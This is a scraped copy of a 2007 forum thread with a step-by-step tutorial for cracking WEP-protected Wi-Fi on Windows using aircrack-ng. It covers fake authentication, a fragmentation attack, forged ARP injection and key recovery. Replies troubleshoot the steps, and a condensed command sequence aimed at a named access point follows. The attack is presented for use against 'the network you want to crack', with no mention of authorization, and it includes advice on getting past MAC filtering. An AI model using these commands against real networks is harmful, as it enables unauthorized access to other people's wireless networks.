Upload
awangyk
View
221
Download
0
Embed Size (px)
Citation preview
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 1/16
THE CRACKING:
Step 1: - Open a command prompt (start > run > cmd.exe)
Step 2:
- type the following in the command prompt:
Quote: cd c:\aircrack\
- HIT ENTER
Step 3: - type the following in the same command prompt:
Quote: airserv-ng -d commview.dll
- HIT ENTER- You should see something like this coming up in the command prompt
Quote: Opening card commview.dllSetting chan 1Opening sock port 666Serving commview.dll chan 1 on port 666
Step 4: - Open a new command prompt (LEAVE THE PREVIOUS ONE OPEN AT ALL TIMES!!)- Typ the following the the new command prompt:
Quote: cd c:\aircrack\
-HIT ENTER
Step 5: - Now typ this in the same command prompt:
Quote: airodump-ng 127.0.0.1:666
- HIT ENTER
note: if you know what channel the to-monitor-network is on you can make it this. I
recommend this!:
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 2/16
Quote: airodump-ng --channel YOURCHANNELNUMBER HERE 127.0.0.1:666
Airodump-ng should start capturing data from the networks on the given channel now, you'll
notice it isn't going fast (except if it's a big company's network or something). We are going tospeed this process up!Take a note of the following:1: BSSID of the network you want to crack = MAC address.2: ESSID of the network you want to crack = name of the network (example: wifi16,mynetwork,...)3: The mac of the card you are using to monitor the packets
LEAVE THE 2 COMMAND PROMPTS YOU ALREADY HAVE OPEN OPEN!!!
Step 6: - Open a new command prompt- Type in the following:
Quote: cd c:\aircrack\
- HIT ENTER
Step 7: - Type in the following in command prompt:
Quote:
aireplay-ng -1 0 -e ESSID-OF-THE-NETWORK-YOU-WANT-TO-CRACK -aBSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
es quite confusing so a quick example:
ESSID = wifi16 BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01
so that will get me:
aireplay-ng -1 0 -e wifi16 -a 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666
if all goes well you'll get this as the outcome:
Quote: Sending Authentication RequestAuthentication successfulSending Association RequestAssociation successful
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 3/16
if you get:
Quote: AP rejects the source MAC address
It means MAC filtering is enabled on the network you want to crack and you'll need to gethold of a mac address that's allowed access.
if you keep getting:
Quote: sending authentication request
Try moving closer to the AP!
Step 8: in the same command prompt as the one in step 7 type:
Quote: aireplay-ng -5 -b BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR 127.0.0.1:666
es quite confusing once again so a quick example:
BSSID = 11:22:33:44:55:66
MAC OF CARD I'M USING = 01:23:45:67:89:01
so that will get me:
aireplay-ng -5 -b 11:22:33:44:55:66 -h 01:23:45:67:89:01 127.0.0.1:666
if all goes well you'll get this:
Quote: Waiting for a data packet...Read #number packets...
Step 9: if you wait a little bit you'll soon be prompted with a packet like this:
Quote:
Size: 120, FromDS: 1, ToDS: 0 (WEP)
BSSID = the bssidDest. MAC = the dest macSource MAC = the source mac
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 4/16
0x0000: 0842 0201 000f b5ab cb9d 0014 6c7e 4080 [email protected]: 00d0 cf03 348c e0d2 4001 0000 2b62 7a01 ....4...@...+bz.0x0020: 6d6d b1e0 92a8 039b ca6f cecb 5364 6e16 mm.......o..Sdn.0x0030: a21d 2a70 49cf eef8 f9b9 279c 9020 30c4 ..*pI.....'.. 0.
0x0040: 7013 f7f3 5953 1234 5727 146c eeaa a594 p...YS.4W'.l....0x0050: fd55 66a2 030f 472d 2682 3957 8429 9ca5 .Uf...G-&.9W.)..0x0060: 517f 1544 bd82 ad77 fe9a cd99 a43c 52a1 Q•.D...w.....<R.0x0070: 0505 933f af2f 740e ...?./t.
Use this packet ?
note: size can vary, I always pressed in y and it worked - press in Y- HIT ENTER
You should see something like this coming up (or similar):
Quote: Saving chosen packet in replay_src-0124-161120.capData packet found!Sending fragmented packetGot RELAYED packet!!Thats our ARP packet!Trying to get 384 bytes of a keystreamGot RELAYED packet!!Thats our ARP packet!
Trying to get 1500 bytes of a keystreamGot RELAYED packet!!Thats our ARP packet!Saving keystream in fragment-0124-161129.xor Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
Note 1: It doesn't need to be 1500 bytes!!
Note 2: Check the bold part, you're going to need this file!
AGAIN DON'T CLOSE THIS COMMAND PROMPT!!
if you keep getting:Quote: Data packet found!Sending fragmented packet No answer, repeating...Trying a LLC NULL packetSending fragmented packet No answer, repeating...
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 5/16
Sending fragmented packet...
Just keep trying! It automatically starts over again (moving closer to the AP has been reportedto help.)
anyways, if you got the bytes of keystream (everything worked) it's time for the next step!
Step 10:
- Press CTRL + C in the command prompt used in step 8- Now type in the following:
Quote: packetforge-ng -0 -a BSSID:OF:THE:NETWORK:YOU:WANT:TO:CRACK -hMAC:OF:THE:CARD:YOU:ARE:USING:TO:MONITOR -k 192.168.1.100 -l (= an ELL nota 1) 192.168.1.1 -y fragment-0124-161129.xor -w arp-request
Remember the file I made bold in part 8? Well it's obviously the same as in 9 meaning youneed to put the same filename here.The part I made green here is the filename you use to save the packet, you can choosewhatever you want but you must use this filename in the upcomming steps!
Step 11:
Now that we've got our ARP REQ packet we can start injecting!
Here's how to do this.- Go to the command prompt used in step 9- Type in the following:
Quote: aireplay-ng -2 -r arp-request 127.0.0.1:666
The green part once again indicates the filename!
You should now see something like this coming up:
Quote: Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:14:6C:7E:40:80Dest. MAC = FF:FF:FF:FF:FF:FFSource MAC = 00:0F:B5:AB:CB:9D
0x0000: 0841 0201 0014 6c7e 4080 000f b5ab cb9d [email protected]: ffff ffff ffff 8001 6c48 0000 0999 881a ........lH......0x0020: 49fc 21ff 781a dc42 2f96 8fcc 9430 144d I.!.x..B/....0.M
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 6/16
0x0030: 3ab2 cff5 d4d1 6743 8056 24ec 9192 c1e1 :.....gC.V$.....0x0040: d64f b709 .O..
Use this packet ?
- Type in Y- HIT ENTER
This should come up now:
Quote: Saving chosen packet in replay_src-0124-163529.capYou should also start airodump-ng to capture replies.End of file.
sent #numberOfPackets ... (#number pps)
You'll see the numberOfPackets rising really fast, you are injecting these packets now.
Step 12:
Now go back to the command prompt where you had airodump-ng in openand press CTRL + Cnow type in the following:
Quote: airodump-ng --channel CHANNELYOUWANTTOCAPTUREFROM --write Filename 127.0.0.1:666
Note: Filename = The name of the file where the data packets are saved, this will be used in
the next step
If all goes correct you should be capturing as much packets per second as you are injecting(maybe even more).
Step 13:
when you think you have enough...note: 200000 min for 64bit (just capture 1Million to be sure) ...press CTRL + C in the command prompt that has airodump-ng running and enter thefollowing:
Quote: aircrack-ng -n 64 Filename.cap
note:
Filename = see previous step
64 = the bit depth of the key (128 for 128bit etc...)
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 7/16
and if it goes like planned a message will pop-up saying:
Quote: KEY FOUND: YourKey
That's it! I hope this was helpful, any question/remarks/complaints please ask/tell and I'll tryto help/respond as soon as possible!!
Extra useful links:WEP CRACK tutorial from nokia:viewtopic.php?t=2069&highlight=wep
Info about the attack used(fragmentation):http://www.aircrack-ng.org/doku.php?id=fragmentation
Zermelo's thread about this subject:viewtopic.php?t=6781&postdays=0&postorder=asc&start=0
Topic on another forum about this:http://tinyshell.be/aircrackng/forum/in ... pic=1626.0 -------------------------------------------------------------------------------------------
Greetz .Transmit(If you all like this tut I'll make one on cracking WEP with commview too)
Last edited by .Transmit on Tue May 11, 2010 7:45 pm, edited 2 times in total.
dgpilot Post subject: Posted: Fri May 18, 2007 6:02 pm
Probie
Joined: Fri May 18, 20071:13 am
This tut is AWESOME!!! And so far it works like a charm, thanksvery much.
The only thing I had trouble with is step 3. It didn't work for meunless I entered the device id
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 8/16
Posts: 8
dinowuff Post subject: Posted: Fri May 18, 2007 6:26 pm
I've posted HOW many
Joined: Sun Dec 25, 2005
11:26 pmPosts: 4933Location: Michigan
WRONG WRONG WRONG
Step one is Turn ON Laptop...
Just Kidding Nice example with good detail. Way to pull all thatinfo into one place.
_________________
No lusers were harmed in the creation of this Taz Zone Post.AND I WANT TO KNOW WHY NOT!09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0
dinowuff Post subject: Posted: Fri May 18, 2007 6:35 pm
I've posted HOW many
Joined: Sun Dec 25, 200511:26 pmPosts: 4933Location: Michigan
Now go dig it!
I just submitted the thing
_________________
No lusers were harmed in the creation of this Taz Zone Post.AND I WANT TO KNOW WHY NOT!09:F9:11:02:9D:74:E3:5B:D8:41:56:C5:63:56:88:C0
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 9/16
brandnew2this Post subject:
Posted: Fri May 18, 2007 7:46 pm
I COULD be outshopping
Joined: Wed Mar 14, 20072:15 am
Posts: 65Location: Kentucky
I had trouble with step 3 as well what did you all do excactly. minesaid somthing about adapter not found. its a netgear and i know itworks with comm view,wil packets, aircrack and back track so iwas just trying to do it this way in order to make a video tutorial orsomthing
jaymill230 Post subject: Posted: Fri May 18, 2007 7:52 pm
UtterTazNutter
Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune, NC
I'm doing video tutorials for backtrack, but I've been a bit lazylately
_________________oo-rahwww.jaymill.net
.Transmit Post subject: Posted: Fri May 18, 2007 9:51 pm
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 10/16
1st Century Addict
Joined: Sat Nov 04, 200612:47 pmPosts: 109
Strange, I'll try and see if I can get a solution for that problem withstep 3, what error were you getting exactly?
EDIT: K maybe found a solution for the ones in trouble with step
3!
Try this (let me know if it works):type this in the command window where the airserv commandfailed:
Quote: airserv-ng -d "commview.dll|debug"
Quotes are important!
You probable get something like this:
Quote: Opening card commview.dll|debug Name: [CommView] Proxim ORiNOCO 802.11b/g ComboCardGold 8470get_guid: name: {15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82} desc: ORiNOCO 802.11bg ComboCard Gold - Paketplaner-MiniportAdapter not foundget_guid()airserv-ng: wi_open(): No error
now type this:
Quote: airserv-ng -d "commview.dll|{15A802FC-ACEE-4CCB-B12A-72CAA3EBDA82}"
Quotes are important!
The red parts need to be the same! (they probably differ foreveryone)
Let me know if it works! and still try to give me the full error.
dgpilot Post subject: Posted: Fri May 18, 2007 10:48 pm
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 11/16
Probie
Joined: Fri May 18, 20071:13 amPosts: 8
Yep thats what I had used earlier and it worked. I guess it dependson your config and cards.
brandnew2this Post subject: Posted: Sat May 19, 2007 7:22 am
I COULD be outshopping
Joined: Wed Mar 14, 2007
2:15 amPosts: 65Location: Kentucky
will try in the a.m. i just got back from my bacholer party so imnot really feeling like............well you know
gismo Post subject: Re: Tutorial: Crack WEP with aircrack + inject packets (WIND
Posted: Sun May 20, 2007 6:54 pm
Wannabee
Hello there!This tutorial looks really amazing, however I'am having a troublewith the step number 3 - after typing airserv-ng -d commview.dll instead of
Opening card commview.dll
Setting chan 1
Opening sock port 666
Serving commview.dll chan 1 on port 666
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 12/16
Joined: Sun May 20, 20076:33 pmPosts: 1
I see
Opening card commview.dll
F1
init_lib<>airserv-ng: wi_open<>: No error
After I try to type in step 5
airodump-ng 127.0.0.1:666 or
airodump-ng --channel YOURCHANNELNUMBER HERE
127.0.0.1:666 (In my case channel 7 is the best one)
I just get a message Failed to connect In other words connecting to 127.0.0.1:666 is not possible in my
case.
I ask you for apologies, I am a newbie, just let me know if youhave any idea how to work this out.I am using Windows Vista on Acer laptop with Atheros AR5005Gnetwork adapter, I installed everything according to the advices(drivers, dll files etc., commview is working normally as well).
Every little helps.
Thanks.[/i]
Xplode Post subject: Posted: Thu May 24, 2007 8:34 pm
Probie
Joined: Thu May 24, 20078:18 pm
gismo are you sure you got the right drivers?? I solved the problem installing Commview drivers, i had Wildpackets first.
I wanted to ask if the debug function would work like this in case iam using wildpackets: airserv-ng -d "peek.dll|debug" Or whatelse??
The AP i am connecting to seems to have a very low traffic so ikeep having (at step 9):Data packet found!
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 13/16
Posts: 7 Sending fragmented packet No answer, repeating...Trying a LLC NULL packetSending fragmented packet No answer, repeating...
Sending fragmented packet...
even after trying for 2 hours...is the low traffic the problem?? I'msaying it because in airodump i got around 10 beacons per second but NO DATA (data=0) for my AP. How could i increase that?? Itried by connecting (without a valid WEP Key) using myintegrated wireless card, and i had some data, but not sufficient oruseful.
Can someone give me some hints please?
jaymill230 Post subject: Posted: Thu May 24, 2007 8:43 pm
UtterTazNutter
Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune, NC
check my tutorial for clientless WEP cracking with fake auth, itswritten for backtrack, but does the exact same thing, range is often
a problem.
_________________oo-rahwww.jaymill.net
Xplode Post subject: Posted: Thu May 24, 2007 8:57 pm
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 14/16
Probie
Joined: Thu May 24, 20078:18 pmPosts: 7
i don't think range is my problem, signal is very strong, could it bethat anyway? i ll read your tut carefully, thanx
Mufftool Post subject: Posted: Thu May 24, 2007 9:42 pm
Probie
Joined: Thu May 24, 20079:16 pmPosts: 5
Hi, I can get to step 9, but when I enter Y after 'Use this packet?', Iget blue screen, flashed error message and my computer dies.
jaymill230 Post subject: Posted: Fri May 25, 2007 12:24 am
UtterTazNutter
Joined: Thu Jan 04, 20079:59 pmPosts: 2227Location: Camp Lejeune,
the program was just recently patched to windows, so its a bit buggy. It may be a driver problem, try reinstalling your
wildpackets driver.
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 15/16
NC
In this example:
the id# of my adapter is {177946D-6D58-4272-AACE-D11DFAE55B8D}the essid of the AP is VQD21
the bssid of the Ap is 00:18:01:E6:B4:3F
the mac address of MY adapter is: 00:0E:9B:45:40:ED
the AP is on channel 9
the driver is the commview atheros driver
Fragmentation Attack
Step 1: Start the wireless interface in monitor mode on AP channel
Airserv-ng –d “commview.dll|{177946D-6D58-4272-AACE-D11DFAE55B8D}” –c9
Step 2: Use aireplay-ng to do a fake authentication with the access point
Aireplay-ng -1 0 –e VQD21 –a 00:18:01:E6:B4:3F –h 00:0E:9B:45:40:ED 127.0.0.1:666
Step 3: Use aireplay-ng to run the fragmentation attack and obtain PRGA Data
aireplay-ng -5 -b 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED 127.0.0.1:666
Step 4: Use packetforge to generate an ARP packet
packetforge-ng -0 -a 00:18:01:E6:B4:3F -h 00:0E:9B:45:40:ED -k 255.255.255.255 -l 255.255.255.255 -y
fragment-0124-161129.xor -w arp-request.cap
Step 5: Use aireplay-ng to replay our forged ARP request
aireplay-ng -2 -r arp-request.cap 120.0.0.1:666
Step 6: Start airodump-ng to capture the IVs
Airodump-ng –c 9 –-bssid 00:18:01:E6:B4:3F –-ivs –w VQD21 127.0.0.1:666
Step 7: Run aircrack-ng to obtain the WEP key
aircrack-ng -b 00:18:01:E6:B4:3F VQD21.ivs
8/13/2019 The Cracking Wifi
http://slidepdf.com/reader/full/the-cracking-wifi 16/16
as a hurestic consideration, for a 64 bit key, you should capture 250,000 ivs, 2,000,000 for 104 bit key.